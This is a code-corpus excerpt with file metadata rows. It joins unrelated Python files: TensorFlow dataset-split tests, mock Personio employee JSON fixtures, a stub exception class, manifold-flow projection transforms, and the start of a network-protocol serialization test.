round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3], [2, 3]])
def test_build_dataset_split_fn_aggregated_recon_epochs_variable_max_steps_multiple_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=2,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5], [4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5], [4, 5]])
def test_build_dataset_split_fn_none_post_recon_multiple_epochs_max_steps(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=2,
post_recon_steps_max=4,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
def test_build_dataset_split_fn_skip_post_recon_multiple_epochs_max_steps(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=2,
post_recon_steps_max=4,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3], [2, 3]])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3], [2, 3]])
def test_build_dataset_split_fn_aggregated_post_recon_multiple_epochs_max_steps(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=2,
post_recon_steps_max=4,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5], [4, 5]])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5], [4, 5]])
def test_build_dataset_split_none_fn_split_dataset_zero_batches(self):
"""Ensures clients without any data don't fail."""
# 0 batches.
client_dataset = tf.data.Dataset.range(0).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_skip_fn_split_dataset_zero_batches(self):
"""Ensures clients without any data don't fail."""
# 0 batches.
client_dataset = tf.data.Dataset.range(0).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=10)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_aggregated_fn_split_dataset_zero_batches(self):
"""Ensures clients without any data don't fail."""
# 0 batches.
client_dataset = tf.data.Dataset.range(0).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=10)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
if __name__ == '__main__':
tf.test.main()
| 37.212471 | 98 | 0.713275 | 4,510 | 32,226 | 4.678271 | 0.031042 | 0.101095 | 0.06825 | 0.081047 | 0.97052 | 0.97052 | 0.97052 | 0.967676 | 0.967202 | 0.966918 | 0 | 0.026277 | 0.183982 | 32,226 | 865 | 99 | 37.255491 | 0.776058 | 0.056166 | 0 | 0.952998 | 0 | 0 | 0.000264 | 0 | 0 | 0 | 0 | 0 | 0.145867 | 1 | 0.038898 | false | 0 | 0.003241 | 0 | 0.04376 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f45bfc0d1631bcc10a8d901f8ee6653013e0247b | 19,036 | py | Python | tests/mock_data.py | philipflohr/personio-py | f093158147a6fa412bd7ba06cb038f667b6f2709 | [
"Apache-2.0"
] | 1 | 2020-10-16T15:29:01.000Z | 2020-10-16T15:29:01.000Z | tests/mock_data.py | philipflohr/personio-py | f093158147a6fa412bd7ba06cb038f667b6f2709 | [
"Apache-2.0"
] | null | null | null | tests/mock_data.py | philipflohr/personio-py | f093158147a6fa412bd7ba06cb038f667b6f2709 | [
"Apache-2.0"
] | null | null | null | import json
json_string_employees = """
{
"success": true,
"data": [{
"type": "Employee",
"attributes": {
"id": {
"label": "ID",
"value": 2116366
},
"first_name": {
"label": "First name",
"value": "Richard"
},
"last_name": {
"label": "Last name",
"value": "Stallman"
},
"email": {
"label": "Email",
"value": "rms@example.org"
},
"gender": {
"label": "Gender",
"value": "male"
},
"status": {
"label": "Status",
"value": "active"
},
"position": {
"label": "Position",
"value": "St. IGNUcius"
},
"supervisor": {
"label": "Supervisor",
"value": null
},
"employment_type": {
"label": "Employment type",
"value": "internal"
},
"weekly_working_hours": {
"label": "Weekly hours",
"value": "40"
},
"hire_date": {
"label": "Hire date",
"value": "1983-09-01T00:00:00+02:00"
},
"contract_end_date": {
"label": "Contract ends",
"value": null
},
"termination_date": {
"label": "Termination date",
"value": null
},
"termination_type": {
"label": "Termination type",
"value": ""
},
"termination_reason": {
"label": "Termination reason",
"value": ""
},
"probation_period_end": {
"label": "Probation period end",
"value": null
},
"created_at": {
"label": "created_at",
"value": "2020-07-23T19:57:57+02:00"
},
"last_modified_at": {
"label": "Last modified",
"value": "2020-07-23T19:57:57+02:00"
},
"subcompany": {
"label": "Subcompany",
"value": null
},
"office": {
"label": "Office",
"value": null
},
"department": {
"label": "Department",
"value": null
},
"cost_centers": {
"label": "Cost center",
"value": []
},
"holiday_calendar": {
"label": "Public holidays",
"value": {
"type": "HolidayCalendar",
"attributes": {
"id": 1,
"name": "Deutschland Feiertage",
"country": "DE",
"state": null
}
}
},
"absence_entitlement": {
"label": "Absence entitlement",
"value": [{
"type": "TimeOffType",
"attributes": {
"id": 195824,
"name": "Vacation",
"entitlement": 0
}
}
]
},
"work_schedule": {
"label": "Work schedule",
"value": {
"type": "WorkSchedule",
"attributes": {
"id": 232617,
"name": "40 hours",
"valid_from": null,
"monday": "08:00",
"tuesday": "08:00",
"wednesday": "08:00",
"thursday": "08:00",
"friday": "08:00",
"saturday": "00:00",
"sunday": "00:00"
}
}
},
"fix_salary": {
"label": "Fix salary",
"value": 0
},
"fix_salary_interval": {
"label": "Salary interval",
"value": ""
},
"hourly_salary": {
"label": "Hourly salary",
"value": 0
},
"vacation_day_balance": {
"label": "Vacation day balance",
"value": 25
},
"last_working_day": {
"label": "Last day of work",
"value": null
},
"profile_picture": {
"label": "Profile Picture",
"value": null
},
"team": {
"label": "Team",
"value": null
},
"dynamic_1146702": {
"label": "Country of Birth",
"value": "USA"
},
"dynamic_1146666": {
"label": "Birthday",
"value": "1953-03-16T00:00:00+01:00"
}
}
}, {
"type": "Employee",
"attributes": {
"id": {
"label": "ID",
"value": 2116365
},
"first_name": {
"label": "First name",
"value": "Alan"
},
"last_name": {
"label": "Last name",
"value": "Turing"
},
"email": {
"label": "Email",
"value": "alan@example.org"
},
"gender": {
"label": "Gender",
"value": "male"
},
"status": {
"label": "Status",
"value": "active"
},
"position": {
"label": "Position",
"value": "Chief Cryptanalyst"
},
"supervisor": {
"label": "Supervisor",
"value": null
},
"employment_type": {
"label": "Employment type",
"value": "internal"
},
"weekly_working_hours": {
"label": "Weekly hours",
"value": "40"
},
"hire_date": {
"label": "Hire date",
"value": "1932-01-01T00:00:00+01:00"
},
"contract_end_date": {
"label": "Contract ends",
"value": "1954-06-07T00:00:00+01:00"
},
"termination_date": {
"label": "Termination date",
"value": null
},
"termination_type": {
"label": "Termination type",
"value": ""
},
"termination_reason": {
"label": "Termination reason",
"value": ""
},
"probation_period_end": {
"label": "Probation period end",
"value": null
},
"created_at": {
"label": "created_at",
"value": "2020-07-23T19:51:46+02:00"
},
"last_modified_at": {
"label": "Last modified",
"value": "2020-07-23T19:53:48+02:00"
},
"subcompany": {
"label": "Subcompany",
"value": null
},
"office": {
"label": "Office",
"value": null
},
"department": {
"label": "Department",
"value": null
},
"cost_centers": {
"label": "Cost center",
"value": []
},
"holiday_calendar": {
"label": "Public holidays",
"value": {
"type": "HolidayCalendar",
"attributes": {
"id": 1,
"name": "Deutschland Feiertage",
"country": "DE",
"state": null
}
}
},
"absence_entitlement": {
"label": "Absence entitlement",
"value": [{
"type": "TimeOffType",
"attributes": {
"id": 195824,
"name": "Vacation",
"entitlement": 0
}
}
]
},
"work_schedule": {
"label": "Work schedule",
"value": {
"type": "WorkSchedule",
"attributes": {
"id": 232617,
"name": "40 hours",
"valid_from": null,
"monday": "08:00",
"tuesday": "08:00",
"wednesday": "08:00",
"thursday": "08:00",
"friday": "08:00",
"saturday": "00:00",
"sunday": "00:00"
}
}
},
"fix_salary": {
"label": "Fix salary",
"value": 0
},
"fix_salary_interval": {
"label": "Salary interval",
"value": ""
},
"hourly_salary": {
"label": "Hourly salary",
"value": 0
},
"vacation_day_balance": {
"label": "Vacation day balance",
"value": 25
},
"last_working_day": {
"label": "Last day of work",
"value": null
},
"profile_picture": {
"label": "Profile Picture",
"value": null
},
"team": {
"label": "Team",
"value": null
},
"dynamic_1146702": {
"label": "Country of Birth",
"value": "England"
},
"dynamic_1146666": {
"label": "Birthday",
"value": "1912-06-23T00:00:00+01:00"
}
}
}, {
"type": "Employee",
"attributes": {
"id": {
"label": "ID",
"value": 2040614
},
"first_name": {
"label": "First name",
"value": "Ada"
},
"last_name": {
"label": "Last name",
"value": "Lovelace"
},
"email": {
"label": "Email",
"value": "ada@example.org"
},
"gender": {
"label": "Gender",
"value": "female"
},
"status": {
"label": "Status",
"value": "active"
},
"position": {
"label": "Position",
"value": "first programmer ever"
},
"supervisor": {
"label": "Supervisor",
"value": null
},
"employment_type": {
"label": "Employment type",
"value": "internal"
},
"weekly_working_hours": {
"label": "Weekly hours",
"value": "35"
},
"hire_date": {
"label": "Hire date",
"value": "1835-02-01T00:00:00+00:53"
},
"contract_end_date": {
"label": "Contract ends",
"value": null
},
"termination_date": {
"label": "Termination date",
"value": null
},
"termination_type": {
"label": "Termination type",
"value": ""
},
"termination_reason": {
"label": "Termination reason",
"value": ""
},
"probation_period_end": {
"label": "Probation period end",
"value": null
},
"created_at": {
"label": "created_at",
"value": "2020-06-18T18:43:44+02:00"
},
"last_modified_at": {
"label": "Last modified",
"value": "2020-07-23T18:00:26+02:00"
},
"subcompany": {
"label": "Subcompany",
"value": null
},
"office": {
"label": "Office",
"value": null
},
"department": {
"label": "Department",
"value": {
"type": "Department",
"attributes": {
"id": 625448,
"name": "Operations"
}
}
},
"cost_centers": {
"label": "Cost center",
"value": []
},
"holiday_calendar": {
"label": "Public holidays",
"value": {
"type": "HolidayCalendar",
"attributes": {
"id": 1,
"name": "Deutschland Feiertage",
"country": "DE",
"state": null
}
}
},
"absence_entitlement": {
"label": "Absence entitlement",
"value": [{
"type": "TimeOffType",
"attributes": {
"id": 195824,
"name": "Vacation",
"entitlement": 0
}
}
]
},
"work_schedule": {
"label": "Work schedule",
"value": {
"type": "WorkSchedule",
"attributes": {
"id": 232617,
"name": "Vollzeit, 40 Stunden ohne Zeiterfassung, (Mo,Di,Mi,Do,Fr) ",
"valid_from": null,
"monday": "08:00",
"tuesday": "08:00",
"wednesday": "08:00",
"thursday": "08:00",
"friday": "08:00",
"saturday": "00:00",
"sunday": "00:00"
}
}
},
"fix_salary": {
"label": "Fix salary",
"value": 0
},
"fix_salary_interval": {
"label": "Salary interval",
"value": ""
},
"hourly_salary": {
"label": "Hourly salary",
"value": 0
},
"vacation_day_balance": {
"label": "Vacation day balance",
"value": 25
},
"last_working_day": {
"label": "Last day of work",
"value": null
},
"profile_picture": {
"label": "Profile Picture",
"value": null
},
"team": {
"label": "Team",
"value": null
},
"dynamic_1146702": {
"label": "Country of Birth",
"value": "England"
},
"dynamic_1146666": {
"label": "Birthday",
"value": "1815-12-10T00:00:00+01:00"
}
}
}
]
}
"""
json_dict_employees = json.loads(json_string_employees)
json_string_employee_ada = """
{
"success": true,
"data": {
"type": "Employee",
"attributes": {
"id": {
"label": "ID",
"value": 2040614
},
"first_name": {
"label": "First name",
"value": "Ada"
},
"last_name": {
"label": "Last name",
"value": "Lovelace"
},
"email": {
"label": "Email",
"value": "ada@example.org"
},
"gender": {
"label": "Gender",
"value": "female"
},
"status": {
"label": "Status",
"value": "active"
},
"position": {
"label": "Position",
"value": "first programmer ever"
},
"supervisor": {
"label": "Supervisor",
"value": null
},
"employment_type": {
"label": "Employment type",
"value": "internal"
},
"weekly_working_hours": {
"label": "Weekly hours",
"value": "35"
},
"hire_date": {
"label": "Hire date",
"value": "1835-02-01T00:00:00+00:53"
},
"contract_end_date": {
"label": "Contract ends",
"value": null
},
"termination_date": {
"label": "Termination date",
"value": null
},
"termination_type": {
"label": "Termination type",
"value": ""
},
"termination_reason": {
"label": "Termination reason",
"value": ""
},
"probation_period_end": {
"label": "Probation period end",
"value": null
},
"created_at": {
"label": "created_at",
"value": "2020-06-18T18:43:44+02:00"
},
"last_modified_at": {
"label": "Last modified",
"value": "2020-07-23T18:00:26+02:00"
},
"subcompany": {
"label": "Subcompany",
"value": null
},
"office": {
"label": "Office",
"value": null
},
"department": {
"label": "Department",
"value": {
"type": "Department",
"attributes": {
"id": 625448,
"name": "Operations"
}
}
},
"cost_centers": {
"label": "Cost center",
"value": []
},
"holiday_calendar": {
"label": "Public holidays",
"value": {
"type": "HolidayCalendar",
"attributes": {
"id": 1,
"name": "Deutschland Feiertage",
"country": "DE",
"state": null
}
}
},
"absence_entitlement": {
"label": "Absence entitlement",
"value": [{
"type": "TimeOffType",
"attributes": {
"id": 195824,
"name": "Vacation",
"entitlement": 0
}
}
]
},
"work_schedule": {
"label": "Work schedule",
"value": {
"type": "WorkSchedule",
"attributes": {
"id": 232617,
"name": "Vollzeit, 40 Stunden ohne Zeiterfassung, (Mo,Di,Mi,Do,Fr) ",
"valid_from": null,
"monday": "08:00",
"tuesday": "08:00",
"wednesday": "08:00",
"thursday": "08:00",
"friday": "08:00",
"saturday": "00:00",
"sunday": "00:00"
}
}
},
"fix_salary": {
"label": "Fix salary",
"value": 0
},
"fix_salary_interval": {
"label": "Salary interval",
"value": ""
},
"hourly_salary": {
"label": "Hourly salary",
"value": 0
},
"vacation_day_balance": {
"label": "Vacation day balance",
"value": 25
},
"last_working_day": {
"label": "Last day of work",
"value": null
},
"profile_picture": {
"label": "Profile Picture",
"value": null
},
"team": {
"label": "Team",
"value": null
},
"dynamic_1146702": {
"label": "Country of Birth",
"value": "England"
},
"dynamic_1146666": {
"label": "Birthday",
"value": "1815-12-10T00:00:00+01:00"
}
}
}
}
"""
json_dict_employee_ada = json.loads(json_string_employee_ada)
json_string_empty_response = """
{
"success": true,
"data": []
}
"""
json_dict_empty_response = json.loads(json_string_empty_response)
json_string_attendance_rms = """
{
"success": true,
"metadata":{
"current_page":1,
"total_pages":1
},
"data": [{
"id": 33479712,
"type": "AttendancePeriod",
"attributes": {
"employee": 2116366,
"date": "1985-03-20",
"start_time": "11:00",
"end_time": "12:30",
"break": 60,
"comment": "release day! GNU Emacs Version 13 is available as free software now *yay*",
"is_holiday": false,
"is_on_time_off": false
}
}, {
"id": 33479612,
"type": "AttendancePeriod",
"attributes": {
"employee": 2116366,
"date": "1985-03-19",
"start_time": "10:30",
"end_time": "22:00",
"break": 120,
"comment": "just a couple more parentheses...",
"is_holiday": false,
"is_on_time_off": false
}
}, {
"id": 33479602,
"type": "AttendancePeriod",
"attributes": {
"employee": 2116366,
"date": "1985-03-18",
"start_time": "10:00",
"end_time": "20:00",
"break": 90,
"comment": "working on GNU Emacs",
"is_holiday": false,
"is_on_time_off": false
}
}
]
}
"""
json_dict_attendance_rms = json.loads(json_string_attendance_rms)
| 24.690013 | 95 | 0.399926 | 1,442 | 19,036 | 5.151179 | 0.144938 | 0.04483 | 0.019386 | 0.006462 | 0.893915 | 0.889607 | 0.875067 | 0.875067 | 0.842219 | 0.833603 | 0 | 0.065135 | 0.430605 | 19,036 | 770 | 96 | 24.722078 | 0.620168 | 0 | 0 | 0.68799 | 0 | 0.002611 | 0.97883 | 0.052269 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.001305 | 0 | 0.001305 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be83377010c9bb0b892eaaa141cb09f2b8b1f3a5 | 164 | py | Python | core/utils/Error/exception.py | osam7a/JesterBot | aeaa2e24af54967573c88bacdec4a704755cdcb7 | [
"MIT"
] | null | null | null | core/utils/Error/exception.py | osam7a/JesterBot | aeaa2e24af54967573c88bacdec4a704755cdcb7 | [
"MIT"
] | null | null | null | core/utils/Error/exception.py | osam7a/JesterBot | aeaa2e24af54967573c88bacdec4a704755cdcb7 | [
"MIT"
] | null | null | null | class myException(Exception):
def __init__(self):
pass
def InvalidActivityChoice(self):
pass
def InvalidChannelID(self):
pass
| 16.4 | 36 | 0.628049 | 15 | 164 | 6.6 | 0.6 | 0.242424 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.29878 | 164 | 9 | 37 | 18.222222 | 0.86087 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.428571 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
be9ae240d3653015ed585046d28d6f4497045544 | 3,883 | py | Python | manifold_flow/transforms/projections.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 199 | 2020-03-31T22:45:31.000Z | 2022-03-18T14:57:23.000Z | manifold_flow/transforms/projections.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 4 | 2020-04-04T18:45:33.000Z | 2022-01-05T03:16:07.000Z | manifold_flow/transforms/projections.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 25 | 2020-04-01T11:04:11.000Z | 2022-03-30T17:21:44.000Z | import torch
import logging
from manifold_flow import transforms
from manifold_flow.utils.various import product
logger = logging.getLogger(__name__)
class ProjectionSplit(transforms.Transform):
def __init__(self, input_dim, output_dim):
super().__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.input_dim_total = product(input_dim)
self.output_dim_total = product(output_dim)
self.mode_in = "vector" if isinstance(input_dim, int) else "image"
self.mode_out = "vector" if isinstance(input_dim, int) else "image"
logger.debug("Set up projection from %s with dimension %s to %s with dimension %s", self.mode_in, self.input_dim, self.mode_out, self.output_dim)
assert self.input_dim_total >= self.output_dim_total, "Input dimension has to be larger than output dimension"
def forward(self, inputs, **kwargs):
if self.mode_in == "vector" and self.mode_out == "vector":
u = inputs[:, : self.output_dim]
rest = inputs[:, self.output_dim :]
elif self.mode_in == "image" and self.mode_out == "vector":
h = inputs.view(inputs.size(0), -1)
u = h[:, : self.output_dim]
rest = h[:, self.output_dim :]
else:
raise NotImplementedError("Unsuppoorted projection modes {}, {}".format(self.mode_in, self.mode_out))
return u, rest
def inverse(self, inputs, **kwargs):
orthogonal_inputs = kwargs.get("orthogonal_inputs", torch.zeros(inputs.size(0), self.input_dim_total - self.output_dim))
if self.mode_in == "vector" and self.mode_out == "vector":
x = torch.cat((inputs, orthogonal_inputs), dim=1)
elif self.mode_in == "image" and self.mode_out == "vector":
c, h, w = self.input_dim
x = torch.cat((inputs, orthogonal_inputs), dim=1)
x = x.view(inputs.size(0), c, h, w)
else:
raise NotImplementedError("Unsuppoorted projection modes {}, {}".format(self.mode_in, self.mode_out))
return x
class Projection(transforms.Transform):
def __init__(self, input_dim, output_dim):
super().__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.input_dim_total = product(input_dim)
self.output_dim_total = product(output_dim)
self.mode_in = "vector" if isinstance(input_dim, int) else "image"
self.mode_out = "vector" if isinstance(input_dim, int) else "image"
logger.debug("Set up projection from %s with dimension %s to %s with dimension %s", self.mode_in, self.input_dim, self.mode_out, self.output_dim)
assert self.input_dim_total >= self.output_dim_total, "Input dimension has to be larger than output dimension"
def forward(self, inputs, **kwargs):
if self.mode_in == "vector" and self.mode_out == "vector":
u = inputs[:, : self.output_dim]
elif self.mode_in == "image" and self.mode_out == "vector":
u = inputs.view(inputs.size(0), -1)
u = u[:, : self.output_dim]
else:
raise NotImplementedError("Unsuppoorted projection modes {}, {}".format(self.mode_in, self.mode_out))
return u
def inverse(self, inputs, **kwargs):
if self.mode_in == "vector" and self.mode_out == "vector":
x = torch.cat((inputs, torch.zeros(inputs.size(0), self.input_dim - self.output_dim)), dim=1)
elif self.mode_in == "image" and self.mode_out == "vector":
c, h, w = self.input_dim
x = torch.cat((inputs, torch.zeros(inputs.size(0), self.input_dim_total - self.output_dim)), dim=1)
x = x.view(inputs.size(0), c, h, w)
else:
raise NotImplementedError("Unsuppoorted projection modes {}, {}".format(self.mode_in, self.mode_out))
return x
| 45.682353 | 153 | 0.638681 | 532 | 3,883 | 4.447368 | 0.135338 | 0.108199 | 0.093407 | 0.071851 | 0.906171 | 0.885461 | 0.885461 | 0.865596 | 0.852071 | 0.852071 | 0 | 0.004386 | 0.236673 | 3,883 | 84 | 154 | 46.22619 | 0.79386 | 0 | 0 | 0.735294 | 0 | 0 | 0.13881 | 0 | 0 | 0 | 0 | 0 | 0.029412 | 1 | 0.088235 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bea4561ef5565595b83e197538c551dbc54d0b1c | 20,844 | py | Python | tests/util/test_network_protocol_files.py | Chinilla/chinilla-blockchain | 59bebcf94e65b74fbb53ad4929bbd79cb28be619 | [
"Apache-2.0"
] | 1 | 2022-03-22T18:11:52.000Z | 2022-03-22T18:11:52.000Z | tests/util/test_network_protocol_files.py | openchia/chia-blockchain | 1a2efa6ee21039b3ac6d9bdb48317b427872d525 | [
"Apache-2.0"
] | null | null | null | tests/util/test_network_protocol_files.py | openchia/chia-blockchain | 1a2efa6ee21039b3ac6d9bdb48317b427872d525 | [
"Apache-2.0"
] | null | null | null | # this file is generated by build_network_protocol_files.py
# flake8: noqa
from typing import Tuple
from pathlib import Path
from tests.util.network_protocol_data import *
from tests.util.protocol_messages_json import *
from tests.util.build_network_protocol_files import get_network_protocol_filename
def parse_blob(input_bytes: bytes) -> Tuple[bytes, bytes]:
size_bytes = input_bytes[:4]
input_bytes = input_bytes[4:]
size = int.from_bytes(size_bytes, "big")
message_bytes = input_bytes[:size]
input_bytes = input_bytes[size:]
return (message_bytes, input_bytes)
def test_protocol_bytes() -> None:
filename: Path = get_network_protocol_filename()
assert filename.exists()
with open(filename, "rb") as f:
input_bytes = f.read()
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(new_signage_point).from_bytes(message_bytes)
assert message == new_signage_point
assert bytes(message) == bytes(new_signage_point)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(declare_proof_of_space).from_bytes(message_bytes)
assert message == declare_proof_of_space
assert bytes(message) == bytes(declare_proof_of_space)
message_bytes, input_bytes = parse_blob(input_bytes)
message = type(request_signed_values).from_bytes(message_bytes)
assert message == request_signed_values
